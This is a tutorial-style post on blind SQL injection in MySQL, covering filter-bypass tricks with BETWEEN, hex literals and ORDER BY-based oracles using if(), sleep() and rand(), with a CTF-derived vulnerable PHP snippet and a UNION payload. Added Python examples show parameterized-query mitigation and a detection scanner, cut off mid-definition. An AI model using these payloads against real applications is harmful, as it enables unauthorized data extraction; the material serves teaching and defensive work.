Two Small SQL Injection Tricks, With Examples
<p><span><strong>Preface</strong></span></p>
<p>
I recently came across two small tricks related to SQL injection and want to share them. Without further ado, let's look at the details.</p>
<p>
<span><strong>The BETWEEN ... AND operator as a replacement for comparison operators</strong></span></p>
<p>
The operator BETWEEN ... AND selects the range of values lying between two values. The values can be numbers, text, or dates.</p>
<p>
BETWEEN ... AND therefore performs a comparison:</p>
<blockquote>
<p>
<code>exp1 between min and max</code></p>
<p>
If the result of exp1 lies between min and max, <code>between and</code> returns <code>1</code>, otherwise it returns <code>0</code>.</p>
</blockquote>
<p>
<strong>Example</strong></p>
<pre><code class="sql">mysql&gt; select * from user;
+----+----------+----------------------------------+-------------------+
| id | username | password                         | email             |
+----+----------+----------------------------------+-------------------+
|  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com  |
|  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com  |
|  3 | admin    | 26fff50e6f9c6ca38e181c65c1531eca | 456456664@qq.com  |
|  4 | add      | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com  |
+----+----------+----------------------------------+-------------------+
mysql&gt; select * from user where id between 1 and 2;
+----+----------+----------------------------------+-------------------+
| id | username | password                         | email             |
+----+----------+----------------------------------+-------------------+
|  1 | a        | 0cc175b9c0f1b6a831c399e269772661 | 456456664@qq.com  |
|  2 | aa       | 4124bc0a9335c27f086f24ba207a4912 | 456456664@qq.com  |
+----+----------+----------------------------------+-------------------+
</code></pre>
<p>
Most databases support BETWEEN ... AND, but they handle the boundaries differently. In MySQL, BETWEEN ... AND includes both boundaries, which in mathematical terms is</p>
<p>
<span><strong>Application in blind injection</strong></span></p>
<p>
BETWEEN ... AND can be used when =, like, regexp, &gt; and &lt; have been filtered.</p>
<pre><code class="sql">mysql&gt; select database();
+------------+
| database() |
+------------+
| test       |
+------------+
1 row in set (0.00 sec)
</code></pre>
<p>
1. Combined with a substring function</p>
<pre><code class="sql">mysql&gt; select mid(database(),1,1) between 'a' and 'a' ;
+-----------------------------------------+
| mid(database(),1,1) between 'a' and 'a' |
+-----------------------------------------+
|                                       0 |
+-----------------------------------------+
1 row in set (0.00 sec)

mysql&gt; select mid(database(),1,1) between 't' and 't' ;
+-----------------------------------------+
| mid(database(),1,1) between 't' and 't' |
+-----------------------------------------+
|                                       1 |
+-----------------------------------------+
1 row in set (0.00 sec)
</code></pre>
<p>
<strong>2. When the substring function is filtered</strong></p>
<p>
Expression</p>
<blockquote>
<p>
<code>select exp between min and max</code></p>
</blockquote>
<p>
When the string-extraction functions are filtered, the way min and max are chosen changes.</p>
<p>
Test 1</p>
<pre><code class="sql">mysql&gt; select 'b' between 'a' and 'c';
+-------------------------+
| 'b' between 'a' and 'c' |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.00 sec)

mysql&gt; select 'b' between 'a' and 'b';
+-------------------------+
| 'b' between 'a' and 'b' |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.00 sec)

mysql&gt; select 'b' between 'b' and 'c';
+-------------------------+
| 'b' between 'b' and 'c' |
+-------------------------+
|                       1 |
+-------------------------+
1 row in set (0.00 sec)
</code></pre>
<p>
Test 2</p>
<pre><code class="sql">mysql&gt; select 'bcd' between 'a' and 'c';
+---------------------------+
| 'bcd' between 'a' and 'c' |
+---------------------------+
|                         1 |
+---------------------------+
1 row in set (0.00 sec)

mysql&gt; select 'bcd' between 'a' and 'b';
+---------------------------+
| 'bcd' between 'a' and 'b' |
+---------------------------+
|                         0 |
+---------------------------+
1 row in set (0.00 sec)

mysql&gt; select 'bcd' between 'b' and 'c';
+---------------------------+
| 'bcd' between 'b' and 'c' |
+---------------------------+
|                         1 |
+---------------------------+
1 row in set (0.00 sec)
</code></pre>
<p>
The tests show that when exp is a single character all three ranges return 1, but when exp is a longer string the range a-b returns 0 while a-c and b-c return 1.</p>
<p>
In other words, when strings are compared only one side of the range is effectively included, i.e. [b,c). This follows from lexicographic ordering: 'bcd' begins with 'b' and is longer, so it sorts after the single character 'b' and fails the upper-bound check, while it still passes the lower bound 'b'.</p>
<p>
So in actual use you have to be careful about the range you choose.</p>
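<p>
The following is an added example, not code from the original post: a small Python model of how <code>exp BETWEEN lo AND hi</code> is evaluated on strings, reproducing the results of Test 1 and Test 2 above, cross-checked against a real SQL engine (SQLite from the standard library) using a parameterized query. Two assumptions: SQLite's default BINARY collation gives the same answers as MySQL for the lowercase ASCII values used here, and MySQL's default case-insensitive collations are approximated by lower-casing the inputs.</p>

```python
"""Model of `exp BETWEEN lo AND hi` on strings, checked against SQLite.
Added example; the collation assumptions are stated in the comments."""

import sqlite3
from typing import List, Tuple


def model_between(exp: str, lo: str, hi: str) -> int:
    """Return 1 when lo <= exp <= hi, else 0.

    Both endpoints are inclusive and strings compare lexicographically.
    A string that merely starts with 'b' sorts after the single character
    'b', so 'bcd' BETWEEN 'a' AND 'b' is 0 even though 'b' BETWEEN 'a'
    AND 'b' is 1. Lower-casing approximates MySQL's default *_ci
    collations (assumption; drop it for a binary collation).
    """
    e, l, h = exp.lower(), lo.lower(), hi.lower()
    return int(l <= e <= h)


def between_halves(exp: str, lo: str, hi: str) -> Tuple[bool, bool]:
    """The two comparisons BETWEEN is made of, so a surprising 0 can be
    traced to the side that rejected exp: (lo <= exp, exp <= hi)."""
    e, l, h = exp.lower(), lo.lower(), hi.lower()
    return (l <= e, e <= h)


def sql_between(exp: str, lo: str, hi: str) -> int:
    """Evaluate the same expression in SQLite (BINARY collation; matches
    MySQL for the lowercase ASCII inputs used here, an assumption).

    The three values travel as bound parameters, never as SQL text. That
    is also the query shape that makes the filter-bypass tricks on this
    page irrelevant: input bound this way can never become SQL syntax.
    """
    con = sqlite3.connect(":memory:")
    try:
        row = con.execute("SELECT ? BETWEEN ? AND ?", (exp, lo, hi)).fetchone()
    finally:
        con.close()
    return int(row[0])


# The (exp, lo, hi) triples from Test 1, Test 2 and the live test above.
CASES: List[Tuple[str, str, str]] = [
    ("b", "a", "c"), ("b", "a", "b"), ("b", "b", "c"),
    ("bcd", "a", "c"), ("bcd", "a", "b"), ("bcd", "b", "c"),
    ("test", "a", "z"), ("test", "t", "z"), ("test", "u", "z"),
    ("test", "ta", "tz"), ("test", "te", "tz"), ("test", "tf", "tz"),
]


def compare_all() -> List[Tuple[str, str, str, int, int]]:
    """(exp, lo, hi, model result, SQLite result) for every case."""
    return [(e, l, h, model_between(e, l, h), sql_between(e, l, h))
            for e, l, h in CASES]


if __name__ == "__main__":
    for e, l, h, m, s in compare_all():
        print(f"{e!r:7} between {l!r:5} and {h!r:5} -> model {m}, "
              f"sqlite {s}, halves {between_halves(e, l, h)}")
```

<p>
Running the block prints each case with the model's answer, SQLite's answer and the two halves of the comparison; the only 0 results are the ones where the upper bound is a prefix of, or sorts before, exp.</p>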
<p>
Live test</p>
<pre><code class="sql">mysql&gt; select database() between 'a' and 'z';
+--------------------------------+
| database() between 'a' and 'z' |
+--------------------------------+
|                              1 |
+--------------------------------+
1 row in set (0.05 sec)
...
mysql&gt; select database() between 't' and 'z';
+--------------------------------+
| database() between 't' and 'z' |
+--------------------------------+
|                              1 |
+--------------------------------+
1 row in set (0.00 sec)

mysql&gt; select database() between 'u' and 'z';
+--------------------------------+
| database() between 'u' and 'z' |
+--------------------------------+
|                              0 |
+--------------------------------+
1 row in set (0.00 sec)
</code></pre>
<p>
The results show that the first character is t.</p>
<p>
The second character</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_308302">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
<div class="line number10 index9 alt1">
10</div>
<div class="line number11 index10 alt2">
11</div>
<div class="line number12 index11 alt1">
12</div>
<div class="line number13 index12 alt2">
13</div>
<div class="line number14 index13 alt1">
14</div>
<div class="line number15 index14 alt2">
15</div>
<div class="line number16 index15 alt1">
16</div>
<div class="line number17 index16 alt2">
17</div>
<div class="line number18 index17 alt1">
18</div>
<div class="line number19 index18 alt2">
19</div>
<div class="line number20 index19 alt1">
20</div>
<div class="line number21 index20 alt2">
21</div>
<div class="line number22 index21 alt1">
22</div>
<div class="line number23 index22 alt2">
23</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql string">'tatest</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql string">+----------------------------------+test</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql string">| database() between '</code><code class="sql plain">ta</code><code class="sql string">' and '</code><code class="sql plain">tz</code><code class="sql string">' |test</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql string">+----------------------------------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql string">| 1 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql string">+----------------------------------+</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql string">1 row in set (0.00 sec)</code>
</div>
<div class="line number8 index7 alt1">
</div>
<div class="line number9 index8 alt2">
<code class="sql string">mysql> select database() between '</code><code class="sql plain">te</code><code class="sql string">' and '</code><code class="sql plain">tz</code><code class="sql string">';</code>
</div>
<div class="line number10 index9 alt1">
<code class="sql string">+----------------------------------+</code>
</div>
<div class="line number11 index10 alt2">
<code class="sql string">| database() between '</code><code class="sql plain">te</code><code class="sql string">' and '</code><code class="sql plain">tz</code><code class="sql string">' |</code>
</div>
<div class="line number12 index11 alt1">
<code class="sql string">+----------------------------------+</code>
</div>
<div class="line number13 index12 alt2">
<code class="sql string">| 1 |</code>
</div>
<div class="line number14 index13 alt1">
<code class="sql string">+----------------------------------+</code>
</div>
<div class="line number15 index14 alt2">
<code class="sql string">1 row in set (0.00 sec)</code>
</div>
<div class="line number16 index15 alt1">
</div>
<div class="line number17 index16 alt2">
<code class="sql string">mysql> select database() between '</code><code class="sql plain">tf</code><code class="sql string">' and '</code><code class="sql plain">tz</code><code class="sql string">';</code>
</div>
<div class="line number18 index17 alt1">
<code class="sql string">+----------------------------------+</code>
</div>
<div class="line number19 index18 alt2">
<code class="sql string">| database() between '</code><code class="sql plain">tf</code><code class="sql string">' and '</code><code class="sql plain">tz' |</code>
</div>
<div class="line number20 index19 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number21 index20 alt2">
<code class="sql plain">| 0 |</code>
</div>
<div class="line number22 index21 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number23 index22 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
The remaining characters are recovered the same way; the final result is test.</p>
<p>
<strong>3. Single quotes are filtered</strong></p>
<p>
BETWEEN ... AND also accepts hexadecimal literals, so hex can be used to get past a filter that only blocks single quotes.</p>
<p>
Test</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_325194">
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql plain">0x61 </code><code class="sql color1">and</code> <code class="sql plain">0x7a; //</code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql string">'a'</code> <code class="sql color1">and</code> <code class="sql string">'z'</code><code class="sql plain">;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| </code><code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql plain">0x61 </code><code class="sql color1">and</code> <code class="sql plain">0x7a |</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| 1 |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
<div class="line number8 index7 alt1">
</div>
<div class="line number9 index8 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql plain">0x74 </code><code class="sql color1">and</code> <code class="sql plain">0x7a; //</code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql string">'t'</code> <code class="sql color1">and</code> <code class="sql string">'z'</code><code class="sql plain">;</code>
</div>
<div class="line number10 index9 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number11 index10 alt2">
<code class="sql plain">| </code><code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql plain">0x74 </code><code class="sql color1">and</code> <code class="sql plain">0x7a |</code>
</div>
<div class="line number12 index11 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number13 index12 alt2">
<code class="sql plain">| 1 |</code>
</div>
<div class="line number14 index13 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number15 index14 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
<div class="line number16 index15 alt1">
</div>
<div class="line number17 index16 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql plain">0x75 </code><code class="sql color1">and</code> <code class="sql plain">0x7a; //</code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql string">'u'</code> <code class="sql color1">and</code> <code class="sql string">'z'</code><code class="sql plain">;</code>
</div>
<div class="line number18 index17 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number19 index18 alt2">
<code class="sql plain">| </code><code class="sql keyword">database</code><code class="sql plain">() </code><code class="sql color1">between</code> <code class="sql plain">0x75 </code><code class="sql color1">and</code> <code class="sql plain">0x7a |</code>
</div>
<div class="line number20 index19 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number21 index20 alt2">
<code class="sql plain">| 0 |</code>
</div>
<div class="line number22 index21 alt1">
<code class="sql plain">+</code><code class="sql comments">----------------------------------+</code>
</div>
<div class="line number23 index22 alt2">
<code class="sql plain">1 row </code><code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
<span><strong>Understanding ORDER BY</strong></span></p>
<p>
ORDER BY is how MySQL sorts the rows returned by a query.<br>
Usage:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_881080">
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">table_name </code><code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">column_name_or_number </code><code class="sql keyword">asc</code><code class="sql plain">; </code><code class="sql comments">-- ascending (the default)</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">table_name </code><code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">column_name_or_number </code><code class="sql keyword">desc</code><code class="sql plain">; </code><code class="sql comments">-- descending</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
The key point is that ORDER BY accepts either a column name or a number (the column's ordinal position in the result). For example:</p>
<p>
id is the name of the first column of the user table, so sorting by id can be written in two ways:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_56759">
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql color2">user</code> <code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">id;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql color2">user</code> <code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">1;</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
<strong>Blind injection via ORDER BY</strong></p>
<p>
Combining ORDER BY with UNION</p>
<p>
I came across this in an Anheng Cup monthly contest.</p>
<p>
Key back-end code</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_222875">
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">$sql = </code><code class="sql string">"select * from admin where username='"</code><code class="sql plain">.$username.</code><code class="sql string">"'"</code><code class="sql plain">;</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">$result = mysql_query($sql);</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">$row = mysql_fetch_array($result);</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">if(isset($row)&&$row[</code><code class="sql string">'username'</code><code class="sql plain">]!=</code><code class="sql string">"admin"</code><code class="sql plain">){</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql spaces"> </code><code class="sql plain">$hit=</code><code class="sql string">"username error!"</code><code class="sql plain">;</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">}</code><code class="sql keyword">else</code><code class="sql plain">{</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql spaces"> </code><code class="sql plain">if ($row[</code><code class="sql string">'password'</code><code class="sql plain">] === $</code><code class="sql keyword">password</code><code class="sql plain">){</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql spaces"> </code><code class="sql plain">$hit=</code><code class="sql string">""</code><code class="sql plain">;</code>
</div>
<div class="line number9 index8 alt2">
<code class="sql spaces"> </code><code class="sql plain">}</code><code class="sql keyword">else</code><code class="sql plain">{</code>
</div>
<div class="line number10 index9 alt1">
<code class="sql spaces"> </code><code class="sql plain">$hit=</code><code class="sql string">"password error!"</code><code class="sql plain">;</code>
</div>
<div class="line number11 index10 alt2">
<code class="sql spaces"> </code><code class="sql plain">}</code>
</div>
<div class="line number12 index11 alt1">
<code class="sql plain">}</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
payload</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_731582">
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">username=admin</code><code class="sql string">' or 1 union select 1,2,binary '</code><code class="sql plain">string' </code><code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">3</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
The SQL statement becomes</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_976225">
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">admin </code><code class="sql keyword">where</code> <code class="sql plain">username=</code><code class="sql string">'admin'</code> <code class="sql color1">or</code> <code class="sql plain">1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1,2,</code><code class="sql keyword">binary</code> <code class="sql string">'string'</code> <code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">3;</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
The sort now compares the third column, that is, the injected string against the password, and the differing page responses give a blind oracle.<br>
Note that it is best to add BINARY, because ORDER BY comparisons are otherwise case-insensitive.</p>
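<p>
Mitigation for the back-end pattern above, and for the earlier BETWEEN/hex section (stripping quotes is not a fix when hex literals are accepted): an added Python example, not code from the original post or the contest, using an in-memory SQLite stand-in for the admin table. The constructed rows, the ORDER_COLUMNS allow-list and the function names are assumptions of this example; its point is that the username must travel as a bound parameter, and that the ORDER BY column, which cannot be bound, must come from an allow-list.</p>

```python
import sqlite3
from typing import List, Optional, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the post's `admin` table.
    The rows are hypothetical and the password values are placeholders."""
    conn = sqlite3.connect(":memory:")
    conn.row_factory = sqlite3.Row
    conn.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO admin VALUES (?, ?, ?)",
        [(1, "admin", "PLACEHOLDER-ADMIN"), (2, "guest", "PLACEHOLDER-GUEST")],
    )
    return conn


def vulnerable_sql(username: str) -> str:
    """The post's PHP pattern reproduced as a string builder only: whatever the
    client sends becomes SQL text, quotes, UNION and ORDER BY included.
    A quote-stripping filter would not help, since BETWEEN accepts 0x.. literals."""
    return "select * from admin where username='" + username + "'"


def lookup_user(conn: sqlite3.Connection, username: str) -> Optional[sqlite3.Row]:
    """Hardened form: the username is a bound parameter. The driver ships it as a
    value, so the post's payloads are compared literally against the column and
    match no row instead of changing the statement."""
    cur = conn.execute("SELECT * FROM admin WHERE username = ?", (username,))
    return cur.fetchone()


# ORDER BY names a column, not a value, so it cannot be parameter-bound. The
# safe pattern is an allow-list mapping client-supplied sort keys to our own
# column names; if(...), rand(...), sleep(...) and subqueries never reach SQL.
ORDER_COLUMNS = {"id": "id", "username": "username"}


def is_allowed_sort_key(sort_key: str) -> bool:
    """True only for keys the application itself defined."""
    return sort_key in ORDER_COLUMNS


def list_users(conn: sqlite3.Connection, sort_key: str = "id",
               descending: bool = False) -> List[Tuple[int, str]]:
    """Sorted listing whose ORDER BY is built solely from allow-listed names."""
    if not is_allowed_sort_key(sort_key):
        raise ValueError(f"unsupported sort key: {sort_key!r}")
    column = ORDER_COLUMNS[sort_key]          # always one of our own identifiers
    direction = "DESC" if descending else "ASC"
    sql = f"SELECT id, username FROM admin ORDER BY {column} {direction}"
    return [(row["id"], row["username"]) for row in conn.execute(sql)]


if __name__ == "__main__":
    conn = make_db()
    payload = "admin' or 1 union select 1,2,binary 'x' order by 3"
    print(vulnerable_sql(payload))              # the text the PHP code would run
    print(lookup_user(conn, payload))           # None: no such username
    print(list_users(conn, "username", True))   # [(2, 'guest'), (1, 'admin')]
    print(is_allowed_sort_key("if(1=1,id,username)"))  # False
```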
<p>
<strong>Blind injection based on if()</strong></p>
<p>
When the column name is known</p>
<p>
Sorting by a different column naturally produces a different page, so the choice of sort column can serve as the blind oracle.</p>
<p>
Example:</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_827095">
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">if(1=1,id,username);</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
Numbers cannot replace the column names here, because the if() expression returns a string type, not an integer.</p>
<p>
When the column name is not known</p>
<p>
payload</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_83890">
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">if(expression,1,(</code><code class="sql keyword">select</code> <code class="sql plain">id </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.tables))</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
When the expression is false, the statement fails with ERROR 1242 (21000): Subquery returns more than 1 row, so the query returns nothing; when the expression is true, the normal page is returned.</p>
<p>
<strong>Time-based blind injection</strong></p>
<p>
payload</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_3341">
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">if(1=1,1,sleep(1))</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
Test results</p>
<blockquote>
<p>
select * from ha order by if(1=1,1,sleep(1)); # normal response time<br>
select * from ha order by if(1=2,1,sleep(1)); # delayed</p>
</blockquote>
<p>
During testing, the delay turned out not to be the 1 second given in sleep(1) but longer than 1 second.</p>
<p>
It turned out that the delay is a multiple of the number of rows covered by the query.</p>
<p>
Formula:</p>
<blockquote>
<p>
delay = the seconds in sleep(1) * number of rows queried</p>
</blockquote>
<p>
The ha table I tested has five rows, so the delay was 5 seconds. When a query covers many rows, the delay becomes very long.</p>
<p>
When writing a script, add a timeout parameter to guard against excessively long delays.</p>
<p>
<strong>Blind injection based on rand()</strong></p>
<p>
I will skip the theory; here are the test results directly</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_694201">
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">ha </code><code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">rand(</code><code class="sql keyword">true</code><code class="sql plain">);</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">----+------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| id | </code><code class="sql keyword">name</code> <code class="sql plain">|</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">----+------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| 9 | </code><code class="sql color1">NULL</code> <code class="sql plain">|</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">| 6 | </code><code class="sql color1">NULL</code> <code class="sql plain">|</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">| 5 | </code><code class="sql color1">NULL</code> <code class="sql plain">|</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql plain">| 1 | dss |</code>
</div>
<div class="line number9 index8 alt2">
<code class="sql plain">| 0 | dasd |</code>
</div>
<div class="line number10 index9 alt1">
<code class="sql plain">+</code><code class="sql comments">----+------+</code>
</div>
<div class="line number11 index10 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql plain">* </code><code class="sql keyword">from</code> <code class="sql plain">ha </code><code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">rand(</code><code class="sql keyword">false</code><code class="sql plain">);</code>
</div>
<div class="line number12 index11 alt1">
<code class="sql plain">+</code><code class="sql comments">----+------+</code>
</div>
<div class="line number13 index12 alt2">
<code class="sql plain">| id | </code><code class="sql keyword">name</code> <code class="sql plain">|</code>
</div>
<div class="line number14 index13 alt1">
<code class="sql plain">+</code><code class="sql comments">----+------+</code>
</div>
<div class="line number15 index14 alt2">
<code class="sql plain">| 1 | dss |</code>
</div>
<div class="line number16 index15 alt1">
<code class="sql plain">| 6 | </code><code class="sql color1">NULL</code> <code class="sql plain">|</code>
</div>
<div class="line number17 index16 alt2">
<code class="sql plain">| 0 | dasd |</code>
</div>
<div class="line number18 index17 alt1">
<code class="sql plain">| 5 | </code><code class="sql color1">NULL</code> <code class="sql plain">|</code>
</div>
<div class="line number19 index18 alt2">
<code class="sql plain">| 9 | </code><code class="sql color1">NULL</code> <code class="sql plain">|</code>
</div>
<div class="line number20 index19 alt1">
<code class="sql plain">+</code><code class="sql comments">----+------+</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
<p>
As the output shows, the row order differs when the rand() seed is true versus false, so the rand() function can be used as a blind oracle.<br>
Example</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_849765">
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql keyword">order</code> <code class="sql keyword">by</code> <code class="sql plain">rand(ascii(mid((</code><code class="sql keyword">select</code> <code class="sql keyword">database</code><code class="sql plain">()),1,1))>96)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
</div>
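<p>
From the detection side, an added Python example that is not part of the original post: a scanner over constructed MySQL general-log style lines that flags the query shapes this post describes (hex literals or built-in functions as BETWEEN operands; if(), seeded rand() or sleep() inside ORDER BY; UNION followed by an ordinal ORDER BY) while leaving an ordinary numeric BETWEEN range and an unseeded ORDER BY rand() alone. The log format, rule names and sample lines are assumptions of this example.</p>

```python
import re
from typing import Dict, List, Optional

# Detection rules for the ORDER BY / BETWEEN shapes described in the post.
# Each pattern keys on syntax that ordinary application queries rarely emit.
RULES = [
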